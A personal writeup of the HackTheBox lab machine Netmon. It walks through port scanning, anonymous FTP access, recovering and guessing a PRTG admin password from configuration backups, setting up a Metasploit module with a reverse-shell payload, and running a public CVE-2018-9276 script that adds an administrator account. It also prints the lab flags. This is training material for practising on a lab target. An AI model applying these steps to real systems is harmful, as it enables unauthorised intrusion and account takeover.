Hackthebox writeup - Netmon

Sat 25 September 2021

A writeup of how I approached the HTB target Netmon. Hackthebox is a fun platform that lets you work on your enumeration, pentesting and hacking skills.

Getting information

Since this is a htb challenge we know the IP of the target, and our first goal is to learn as much as possible about the target.

  • -vv: Verbosity is increased 2x to allow us to see what Nmap is doing during the scan.
  • --reason: Adds a column to our map results for why Nmap classified it that port.
  • -Pn: Tells Nmap to skip the ping test and just scan our provided target since we know it's up (10.10.10.197).
  • -A: More aggressive scan including OS detection, Version detection, traceroute, script scanning.
  • --osscan-guess: Asks NMAP to guess the OS version if no perfect match found.
  • --version-all: Tries all version probs for every port.
  • -p-: Scan ports 1 - 65535.

PS: db_nmap can take alle the normal nmap options and parameters.

msf6 > db_nmap -vv --reason -Pn -A --osscan-guess --version-all -p- 10.10.10.152
[*] Nmap: 'Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.'
[*] Nmap: Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-25 23:41 CEST
[*] Nmap: NSE: Loaded 153 scripts for scanning.
[*] Nmap: NSE: Script Pre-scanning.
[*] Nmap: NSE: Starting runlevel 1 (of 3) scan.                                                                                                                                                              
[*] Nmap: Initiating NSE at 23:41                                                                                                                                                                            
[*] Nmap: Completed NSE at 23:41, 0.00s elapsed                                                                                                                                                              
[*] Nmap: NSE: Starting runlevel 2 (of 3) scan.                                                                                                                                                              
[*] Nmap: Initiating NSE at 23:41                                                                                                                                                                            
[*] Nmap: Completed NSE at 23:41, 0.00s elapsed                                                                                                                                                              
[*] Nmap: NSE: Starting runlevel 3 (of 3) scan.                                                                                                                                                              
[*] Nmap: Initiating NSE at 23:41                                                                                                                                                                            
[*] Nmap: Completed NSE at 23:41, 0.00s elapsed                                                                                                                                                              
[*] Nmap: Initiating Parallel DNS resolution of 1 host. at 23:41                                                                                                                                             
[*] Nmap: Completed Parallel DNS resolution of 1 host. at 23:41, 0.19s elapsed                                                                                                                               
[*] Nmap: Initiating Connect Scan at 23:41                                                                                                                                                                   
[*] Nmap: Scanning 10.10.10.152 [65535 ports]                                                                                                                                                                
[*] Nmap: Discovered open port 445/tcp on 10.10.10.152                                                                                                                                                       
[*] Nmap: Discovered open port 80/tcp on 10.10.10.152                                                                                                                                                        
[*] Nmap: Discovered open port 139/tcp on 10.10.10.152                                                                                                                                                       
[*] Nmap: Discovered open port 21/tcp on 10.10.10.152                                                                                                                                                        
[*] Nmap: Discovered open port 135/tcp on 10.10.10.152
[*] Nmap: Discovered open port 49668/tcp on 10.10.10.152
[*] Nmap: Discovered open port 47001/tcp on 10.10.10.152
[*] Nmap: Discovered open port 49665/tcp on 10.10.10.152
[*] Nmap: Discovered open port 49666/tcp on 10.10.10.152
[*] Nmap: Discovered open port 49667/tcp on 10.10.10.152
[*] Nmap: Discovered open port 49664/tcp on 10.10.10.152
[*] Nmap: Discovered open port 5985/tcp on 10.10.10.152
[*] Nmap: Discovered open port 49669/tcp on 10.10.10.152
[*] Nmap: Completed Connect Scan at 02:56, 11675.47s elapsed (65535 total ports)
[*] Nmap: Initiating Service scan at 02:56
[*] Nmap: Scanning 13 services on 10.10.10.152
[*] Nmap: Service scan Timing: About 61.54% done; ETC: 02:58 (0:00:40 remaining)
[*] Nmap: Completed Service scan at 02:57, 63.86s elapsed (13 services on 1 host)
[*] Nmap: NSE: Script scanning 10.10.10.152.
[*] Nmap: NSE: Starting runlevel 1 (of 3) scan.
[*] Nmap: Initiating NSE at 02:57
[*] Nmap: NSE: [ftp-bounce 10.10.10.152:21] PORT response: 501 Server cannot accept argument.
[*] Nmap: Completed NSE at 02:57, 8.56s elapsed
[*] Nmap: NSE: Starting runlevel 2 (of 3) scan.
[*] Nmap: Initiating NSE at 02:57
[*] Nmap: Completed NSE at 02:57, 0.99s elapsed
[*] Nmap: NSE: Starting runlevel 3 (of 3) scan.
[*] Nmap: Initiating NSE at 02:57
[*] Nmap: Completed NSE at 02:57, 0.01s elapsed
[*] Nmap: Nmap scan report for 10.10.10.152
[*] Nmap: Host is up, received user-set (0.050s latency).
[*] Nmap: Scanned at 2021-09-25 23:41:50 CEST for 11749s
[*] Nmap: Not shown: 65508 closed ports
[*] Nmap: Reason: 65508 conn-refused
[*] Nmap: PORT      STATE    SERVICE      REASON      VERSION
[*] Nmap: 21/tcp    open     ftp          syn-ack     Microsoft ftpd
[*] Nmap: | ftp-anon: Anonymous FTP login allowed (FTP code 230)
[*] Nmap: | 02-03-19  12:18AM                 1024 .rnd
[*] Nmap: | 02-25-19  10:15PM       <DIR>          inetpub
[*] Nmap: | 07-16-16  09:18AM       <DIR>          PerfLogs
[*] Nmap: | 02-25-19  10:56PM       <DIR>          Program Files
[*] Nmap: | 02-03-19  12:28AM       <DIR>          Program Files (x86)
[*] Nmap: | 02-03-19  08:08AM       <DIR>          Users
[*] Nmap: |_02-25-19  11:49PM       <DIR>          Windows
[*] Nmap: | ftp-syst:
[*] Nmap: |_  SYST: Windows_NT
[*] Nmap: 80/tcp    open     http         syn-ack     Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
[*] Nmap: |_http-favicon: Unknown favicon MD5: 36B3EF286FA4BEFBB797A0966B456479
[*] Nmap: | http-methods:
[*] Nmap: |_  Supported Methods: GET HEAD POST OPTIONS
[*] Nmap: |_http-server-header: PRTG/18.1.37.13946
[*] Nmap: | http-title: Welcome | PRTG Network Monitor (NETMON)
[*] Nmap: |_Requested resource was /index.htm
[*] Nmap: |_http-trane-info: Problem with XML parsing of /evox/about
[*] Nmap: 135/tcp   open     msrpc        syn-ack     Microsoft Windows RPC
[*] Nmap: 139/tcp   open     netbios-ssn  syn-ack     Microsoft Windows netbios-ssn
[*] Nmap: 445/tcp   open     microsoft-ds syn-ack     Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
[*] Nmap: 1175/tcp  filtered dossier      no-response
[*] Nmap: 1334/tcp  filtered writesrv     no-response
[*] Nmap: 5962/tcp  filtered unknown      no-response
[*] Nmap: 5985/tcp  open     http         syn-ack     Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
[*] Nmap: |_http-server-header: Microsoft-HTTPAPI/2.0
[*] Nmap: |_http-title: Not Found
[*] Nmap: 15203/tcp filtered unknown      no-response
[*] Nmap: 18721/tcp filtered unknown      no-response
[*] Nmap: 19475/tcp filtered unknown      no-response
[*] Nmap: 26198/tcp filtered unknown      no-response
[*] Nmap: 38477/tcp filtered unknown      no-response
[*] Nmap: 41369/tcp filtered unknown      no-response
[*] Nmap: 43909/tcp filtered unknown      no-response
[*] Nmap: 45481/tcp filtered unknown      no-response
[*] Nmap: 47001/tcp open     http         syn-ack     Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
[*] Nmap: |_http-server-header: Microsoft-HTTPAPI/2.0
[*] Nmap: |_http-title: Not Found
[*] Nmap: 49664/tcp open     msrpc        syn-ack     Microsoft Windows RPC
[*] Nmap: 49665/tcp open     msrpc        syn-ack     Microsoft Windows RPC
[*] Nmap: 49666/tcp open     msrpc        syn-ack     Microsoft Windows RPC
[*] Nmap: 49667/tcp open     msrpc        syn-ack     Microsoft Windows RPC
[*] Nmap: 49668/tcp open     msrpc        syn-ack     Microsoft Windows RPC
[*] Nmap: 49669/tcp open     msrpc        syn-ack     Microsoft Windows RPC
[*] Nmap: 55878/tcp filtered unknown      no-response
[*] Nmap: 56161/tcp filtered unknown      no-response
[*] Nmap: 61260/tcp filtered unknown      no-response
[*] Nmap: Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
[*] Nmap: Host script results:
[*] Nmap: |_clock-skew: mean: 8m19s, deviation: 0s, median: 8m18s
[*] Nmap: | p2p-conficker:
[*] Nmap: |   Checking for Conficker.C or higher...
[*] Nmap: |   Check 1 (port 33374/tcp): CLEAN (Couldn't connect)
[*] Nmap: |   Check 2 (port 54316/tcp): CLEAN (Couldn't connect)
[*] Nmap: |   Check 3 (port 15668/udp): CLEAN (Failed to receive data)
[*] Nmap: |   Check 4 (port 59130/udp): CLEAN (Timeout)
[*] Nmap: |_  0/4 checks are positive: Host is CLEAN or ports are blocked
[*] Nmap: | smb-security-mode:
[*] Nmap: |   authentication_level: user
[*] Nmap: |   challenge_response: supported
[*] Nmap: |_  message_signing: disabled (dangerous, but default)
[*] Nmap: | smb2-security-mode:
[*] Nmap: |   2.02:
[*] Nmap: |_    Message signing enabled but not required
[*] Nmap: | smb2-time:
[*] Nmap: |   date: 2021-09-26T01:05:50
[*] Nmap: |_  start_date: 2021-09-25T21:44:55
[*] Nmap: NSE: Script Post-scanning.
[*] Nmap: NSE: Starting runlevel 1 (of 3) scan.
[*] Nmap: Initiating NSE at 02:57
[*] Nmap: Completed NSE at 02:57, 0.00s elapsed
[*] Nmap: NSE: Starting runlevel 2 (of 3) scan.
[*] Nmap: Initiating NSE at 02:57
[*] Nmap: Completed NSE at 02:57, 0.00s elapsed
[*] Nmap: NSE: Starting runlevel 3 (of 3) scan.
[*] Nmap: Initiating NSE at 02:57
[*] Nmap: Completed NSE at 02:57, 0.00s elapsed
[*] Nmap: Read data files from: /usr/bin/../share/nmap
[*] Nmap: Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 11749.80 seconds

msf6 > services 10.10.10.152
Services
========

host          port   proto  name          state     info
----          ----   -----  ----          -----     ----
10.10.10.152  21     tcp    ftp           open      Microsoft ftpd
10.10.10.152  57     tcp    priv-term     filtered
10.10.10.152  80     tcp    http          open      Indy httpd 18.1.37.13946 Paessler PRTG bandwidth monitor
10.10.10.152  135    tcp    msrpc         open      Microsoft Windows RPC
10.10.10.152  139    tcp    netbios-ssn   open      Microsoft Windows netbios-ssn
10.10.10.152  251    tcp    unknown       filtered
10.10.10.152  445    tcp    microsoft-ds  open      Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
10.10.10.152  537    tcp    nmsp          filtered
10.10.10.152  815    tcp    unknown       filtered
10.10.10.152  1646   tcp    sa-msg-port   filtered
10.10.10.152  3459   tcp    integral      filtered
10.10.10.152  5985   tcp    http          open      Microsoft HTTPAPI httpd 2.0 SSDP/UPnP
...
10.10.10.152  19007  tcp    scintilla     filtered
...
10.10.10.152  30704  tcp    unknown       filtered
...
10.10.10.152  47001  tcp    http          open      Microsoft HTTPAPI httpd 2.0 SSDP/UPnP
10.10.10.152  47665  tcp                  filtered
10.10.10.152  49664  tcp    msrpc         open      Microsoft Windows RPC
10.10.10.152  49665  tcp    msrpc         open      Microsoft Windows RPC
10.10.10.152  49666  tcp    msrpc         open      Microsoft Windows RPC
10.10.10.152  49667  tcp    msrpc         open      Microsoft Windows RPC
10.10.10.152  49668  tcp    msrpc         open      Microsoft Windows RPC
10.10.10.152  49669  tcp    msrpc         open      Microsoft Windows RPC
...
10.10.10.152  59122  tcp    unknown       filtered
...

msf6 >

Looking at the result of the nmap scan we can see alot of open ports.

And a search with Nikto:

netmon@kali:~$ nikto -Cgidirs all -host 10.10.10.152 -port 80
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.152
+ Target Hostname:    10.10.10.152
+ Target Port:        80
+ Start Time:         2021-09-26 00:05:50 (GMT2)
---------------------------------------------------------------------------
+ Server: PRTG/18.1.37.13946
+ Retrieved access-control-allow-origin header: *
+ The anti-clickjacking X-Frame-Options header is not present.
+ OSVDB-36894: /postnuke/My_eGallery/public/displayCategory.php: My_eGallery prior to 3.1.1.g are vulnerable to a remote execution bug via SQL command injection. displayCategory.php calls imageFunctions.php without checking URL/location arguments.
+ OSVDB-36894: /postnuke/html/My_eGallery/public/displayCategory.php: My_eGallery prior to 3.1.1.g are vulnerable to a remote execution bug via SQL command injection. displayCategory.php calls imageFunctions.php without checking URL/location arguments.
+ ERROR: Error limit (20) reached for host, giving up. Last error: opening stream: can't connect (timeout): Transport endpoint is not connected
+ Scan terminated:  19 error(s) and 4 item(s) reported on remote host
+ End Time:           2021-09-29 18:36:08 (GMT2) (5004 seconds)

+ 1 host(s) tested

Nikto also gives us some pretty good clues for attack-vectors we can try.

Search for user

The first thing I tried was login into the webinterface with the credentials prtgadmin:prtgadmin:

but this does not work :/ , so the default credentials are changed.

Let us search metasploit for anything related:

msf6 > search prtg

Matching Modules
================

   #  Name                                         Disclosure Date  Rank       Check  Description
   -  ----                                         ---------------  ----       -----  -----------
   0  exploit/windows/http/prtg_authenticated_rce  2018-06-25       excellent  Yes    PRTG Network Monitor Authenticated RCE


Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/http/prtg_authenticated_rce

msf6 > use 0
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/http/prtg_authenticated_rce) >

msf6 exploit(windows/http/prtg_authenticated_rce) > options

Module options (exploit/windows/http/prtg_authenticated_rce):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   ADMIN_PASSWORD  prtgadmin        yes       The password for the specified username
   ADMIN_USERNAME  prtgadmin        yes       The username to authenticate as
   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS          10.10.10.152     yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT           80               yes       The target port (TCP)
   SSL             false            no        Negotiate SSL/TLS for outgoing connections
   VHOST                            no        HTTP server virtual host


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.10.16.7       yes       The listen address (an interface may be specified)
   LPORT     8001             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting

we found a exploit, but this one require a admin username and password, which we dont have yet.

Let us try something simpler:

netmon@kali:/mnt/hgfs/kali_share/netmon$ ftp 10.10.10.152
Connected to 10.10.10.152.
220 Microsoft FTP Service
Name (10.10.10.152:netmon): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection.
02-03-19  12:18AM                 1024 .rnd
02-25-19  10:15PM       <DIR>          inetpub
07-16-16  09:18AM       <DIR>          PerfLogs
02-25-19  10:56PM       <DIR>          Program Files
02-03-19  12:28AM       <DIR>          Program Files (x86)
02-03-19  08:08AM       <DIR>          Users
02-25-19  11:49PM       <DIR>          Windows
226 Transfer complete.
ftp> cd Users
250 CWD command successful.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
02-25-19  11:44PM       <DIR>          Administrator
02-03-19  12:35AM       <DIR>          Public
226 Transfer complete.
ftp> cd Public
ls
250 CWD command successful.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
02-03-19  08:05AM       <DIR>          Documents
07-16-16  09:18AM       <DIR>          Downloads
07-16-16  09:18AM       <DIR>          Music
07-16-16  09:18AM       <DIR>          Pictures
02-03-19  12:35AM                   33 user.txt
07-16-16  09:18AM       <DIR>          Videos
226 Transfer complete.
ftp> get user.txt
local: user.txt remote: user.txt
200 PORT command successful.
125 Data connection already open; Transfer starting.
WARNING! 1 bare linefeeds received in ASCII mode
File may not have transferred correctly.
226 Transfer complete.
33 bytes received in 0.05 secs (0.6336 kB/s)
ftp>

Go back to your attacking machine:

netmon@kali:/mnt/hgfs/kali_share/netmon$ cat user.txt 
dd58ce67b49e15105e88096c8d9255a5

Voila, userflag. Submit and proceed.

Quest for root

Let us continue to poke around on the ftp-server:

ftp> cd "/ProgramData/Paessler/PRTG Network Monitor"
250 CWD command successful.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
11-04-21  06:20PM       <DIR>          Configuration Auto-Backups
11-04-21  08:00PM       <DIR>          Log Database
02-03-19  12:18AM       <DIR>          Logs (Debug)
02-03-19  12:18AM       <DIR>          Logs (Sensors)
02-03-19  12:18AM       <DIR>          Logs (System)
11-05-21  12:00AM       <DIR>          Logs (Web Server)
11-04-21  08:04PM       <DIR>          Monitoring Database
02-25-19  10:54PM              1189697 PRTG Configuration.dat
02-25-19  10:54PM              1189697 PRTG Configuration.old
07-14-18  03:13AM              1153755 PRTG Configuration.old.bak
11-05-21  04:08AM              1699228 PRTG Graph Data Cache.dat
02-25-19  11:00PM       <DIR>          Report PDFs
02-03-19  12:18AM       <DIR>          System Information Database
02-03-19  12:40AM       <DIR>          Ticket Database
02-03-19  12:18AM       <DIR>          ToDo Database
226 Transfer complete.

ftp> get "PRTG Configuration.dat"
local: PRTG Configuration.dat remote: PRTG Configuration.dat
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
1189697 bytes received in 85.09 secs (13.6540 kB/s)

ftp> get "PRTG Configuration.old"
local: PRTG Configuration.old remote: PRTG Configuration.old
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
1189697 bytes received in 85.09 secs (13.6540 kB/s)

ftp> get "PRTG Configuration.old.bak"
local: PRTG Configuration.old.bak remote: PRTG Configuration.old.bak
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
1153755 bytes received in 85.09 secs (13.6540 kB/s)

Ok, we found 3 files that might be interesting, let's examine them:

netmon@kali:/mnt/hgfs/kali_share/netmon$ cat PRTG\ Configuration.dat | grep -b1 -a1 prtgadmin
1154908-                <login>
1154932:                  prtgadmin
1154960-                </login>
netmon@kali:/mnt/hgfs/kali_share/netmon$ cat PRTG\ Configuration.old | grep -b1 -a1 prtgadmin
1154908-                <login>
1154932:                  prtgadmin
1154960-                </login>
netmon@kali:/mnt/hgfs/kali_share/netmon$ cat PRTG\ Configuration.old.bak | grep -b1 -a1 prtgadmin
10039-            <dbpassword>
10064:        <!-- User: prtgadmin -->
10096-        PrTg@dmin2018
--
1121822-                <login>
1121846:                  prtgadmin
1121874-                </login>
netmon@kali:/mnt/hgfs/kali_share/netmon$

aha, there is something looking like a username and password combination: prtgadmin:PrTg@dmin2018.

I tried the credentials (prtgadmin:PrTg@dmin2018) on the webpage, but it did not work.

I also notice that the password contains a year (2018) pattern. Lets try increment the pattern: PrTg@dmin2019.

Ok, we are allowed in on the webapplication.

Search and exploit

Let's check the exploitdb for possible exploits:

netmon@kali:/usr/share/exploitdb$ searchsploit prtg
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                                             |  Path
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
PRTG Network Monitor 18.2.38 - (Authenticated) Remote Code Execution                                                                                                       | windows/webapps/46527.sh
PRTG Network Monitor 20.4.63.1412 - 'maps' Stored XSS                                                                                                                      | windows/webapps/49156.txt
PRTG Network Monitor < 18.1.39.1648 - Stack Overflow (Denial of Service)                                                                                                   | windows_x86/dos/44500.py
PRTG Traffic Grapher 6.2.1 - 'url' Cross-Site Scripting                                                                                                                    | java/webapps/34108.txt
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results
netmon@kali:/usr/share/exploitdb$ cd exploits/windows/webapps/
netmon@kali:/usr/share/exploitdb/exploits/windows/webapps$ ./46527.sh

[+]#########################################################################[+] 
[*] Authenticated PRTG network Monitor remote code execution                [*] 
[+]#########################################################################[+] 
[*] Date: 11/03/2019                                                        [*] 
[+]#########################################################################[+] 
[*] Author: https://github.com/M4LV0   lorn3m4lvo@protonmail.com            [*] 
[+]#########################################################################[+] 
[*] Vendor Homepage: https://www.paessler.com/prtg                          [*] 
[*] Version: 18.2.38                                                        [*] 
[*] CVE: CVE-2018-9276                                                      [*] 
[*] Reference: https://www.codewatch.org/blog/?p=453                        [*] 
[+]#########################################################################[+]

# login to the app, default creds are prtgadmin/prtgadmin. once athenticated grab your cookie and use it with the script.
# run the script to create a new user 'pentest' in the administrators group with password 'P3nT3st!'

[+]#########################################################################[+] 
 EXAMPLE USAGE: ./prtg-exploit.sh -u http://10.10.10.10 -c "_ga=GA1.4.XXXXXXX.XXXXXXXX; _gid=GA1.4.XXXXXXXXXX.XXXXXXXXXXXX; OCTOPUS1813713946=XXXXXXXXXXXXXXXXXXXXXXXXXXXXX; _gat=1"

I found an exploit that require a authenticated session's cookie, which we do have! Let us dig out the cookie and feed it into the exploit:

netmon@kali:/usr/share/exploitdb/exploits/windows/webapps$ ./46526.sh -u http://10.10.10.152 -c "_ga=GA1.4.1909516305.1632606352; _gid=GA1.4.1326702577.16360626399; OCTOPUS1813713946=e0RCRDU3OTZCLTNBMzctNDM1RS1BMERBLTY3N0I5RkQ3RjFDRn0%3D; _gat=1"
[+]#########################################################################[+] 
[*] Authenticated PRTG network Monitor remote code execution                [*] 
[+]#########################################################################[+] 
[*] Date: 11/03/2019                                                        [*] 
[+]#########################################################################[+] 
[*] Author: https://github.com/M4LV0   lorn3m4lvo@protonmail.com            [*] 
[+]#########################################################################[+] 
[*] Vendor Homepage: https://www.paessler.com/prtg                          [*] 
[*] Version: 18.2.38                                                        [*] 
[*] CVE: CVE-2018-9276                                                      [*] 
[*] Reference: https://www.codewatch.org/blog/?p=453                        [*] 
[+]#########################################################################[+]

# login to the app, default creds are prtgadmin/prtgadmin. once athenticated grab your cookie and use it with the script.
# run the script to create a new user 'pentest' in the administrators group with password 'P3nT3st!'

[+]#########################################################################[+]

 [*] file created 
 [*] sending notification wait....

 [*] adding a new user 'pentest' with password 'P3nT3st' 
 [*] sending notification wait....

 [*] adding a user pentest to the administrators group 
 [*] sending notification wait....


 [*] exploit completed new user 'pentest' with password 'P3nT3st!' created have fun! 
netmon@kali:/usr/share/exploitdb/exploits/windows/webapps$

We now have a user pentest:P3nT3st! inside the administrators group, let's test it:

netmon@kali:/mnt/hgfs/kali_share/netmon$ smbmap -u pentest -p P3nT3st! -H 10.10.10.152
[+] IP: 10.10.10.152:445        Name: 10.10.10.152                                      
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  READ, WRITE     Remote Admin
        C$                                                      READ, WRITE     Default share
        IPC$                                                    READ ONLY       Remote IPC
netmon@kali:/mnt/hgfs/kali_share/netmon$

Ok, now mount the smb-share and browse for the flag:

Copy the flag and paste it into htb: 3018977fb944bf1878f75b879fba67cc.

Congratulations!

You have now got both the user AND the root flag for the htb Netmon.

Some final words

The most frustrating part of this box was probably that the correct credentials for the website did not work until a reset of the box. I tried too many times before I gave up and gave the box a reset. Looking into the comments on the forum I was not the only one facing this issue.

Comments